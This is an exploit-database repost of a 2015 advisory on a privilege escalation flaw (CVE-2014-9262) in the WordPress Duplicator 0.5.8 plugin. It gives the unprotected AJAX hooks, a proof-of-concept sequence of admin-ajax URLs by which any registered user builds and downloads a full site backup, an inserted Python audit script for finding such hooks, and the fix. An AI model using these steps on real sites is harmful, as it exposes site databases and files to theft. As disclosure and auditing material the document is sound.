zdt | Kacper Szurek | 1337DAY-ID-23304
Feb 18, 2015 - 12:00 a.m.

WordPress Duplicator 0.5.8 Privilege Escalation Vulnerability

2015-02-18 00:00:00
Kacper Szurek
0day.today

EPSS: 0.025 (Low), percentile 90.2%

WordPress Duplicator plugin version 0.5.8 suffers from a backup-related vulnerability that allows for privilege escalation.

# Exploit Title: Duplicator 0.5.8 Privilege Escalation
# Date: 21-11-2014
# Software Link: https://wordpress.org/plugins/duplicator/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9262

1. Description
  
Every registered user can create and download backup files.

File: duplicator\duplicator.php
add_action('wp_ajax_duplicator_package_scan',		'duplicator_package_scan');
add_action('wp_ajax_duplicator_package_build',		'duplicator_package_build');
add_action('wp_ajax_duplicator_package_delete',		'duplicator_package_delete');
add_action('wp_ajax_duplicator_package_report',		'duplicator_package_report');

http://security.szurek.pl/duplicator-058-privilege-escalation.html
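
An added example, not part of the original advisory or the plugin's code: a small Python audit that lists `wp_ajax_` hooks whose handler never calls `current_user_can()`, the pattern described above. The `demo_*` names and the PHP sample are constructed for illustration; the brace matching is naive (it ignores strings and comments), so treat the output as leads for manual review.

```python
import re

# Constructed PHP sample: the first handler has no authorization check (the
# pattern in the advisory); the second checks a nonce and a capability.
SAMPLE_PHP = r"""
add_action('wp_ajax_demo_package_build',   'demo_package_build');
add_action('wp_ajax_demo_package_delete',  'demo_package_delete');
function demo_package_build() {
    $name = demo_make_archive();
    die(json_encode(array('File' => $name)));
}
function demo_package_delete() {
    check_ajax_referer('demo_delete', 'nonce');
    if (!current_user_can('manage_options')) { wp_die('Forbidden'); }
    demo_remove_archive($_POST['id']);
}
"""

# Captures: optional "nopriv_" prefix, action name, handler function name.
HOOK_RE = re.compile(
    r"add_action\(\s*['\"]wp_ajax_(nopriv_)?([\w-]+)['\"]\s*,\s*['\"](\w+)['\"]")

def function_body(src, name):
    """Return the text inside the braces of `function name(...)`, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:          # walk to the matching closing brace
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit_ajax_hooks(src):
    """List (action, handler, problem) for hooks lacking a capability check.
    A nonce alone is CSRF protection, not authorization, so it does not count."""
    findings = []
    for nopriv, action, handler in HOOK_RE.findall(src):
        body = function_body(src, handler)
        if body is None:
            findings.append((action, handler, "handler not found in this file"))
        elif "current_user_can(" not in body:
            extra = "; also reachable unauthenticated" if nopriv else ""
            findings.append((action, handler, "no current_user_can() check" + extra))
    return findings

if __name__ == "__main__":
    for finding in audit_ajax_hooks(SAMPLE_PHP):
        print(finding)
```

Run it over the concatenated plugin source so that handlers defined in other files are found; a handler that delegates the check to a helper will still be flagged and needs a manual look.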

2. Proof of Concept

Log in as a regular user (created using wp-login.php?action=register), then start a scan:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_scan

After that, you can build the backup:

http://wordpress-url/wp-admin/admin-ajax.php?action=duplicator_package_build

This function returns JSON with the backup name in the File key.

You can download the backup using:

http://wordpress-url/wp-snapshots/%file_name_from_json%

3. Solution:
  
Update to version 0.5.10

#  0day.today [2018-01-04]  #
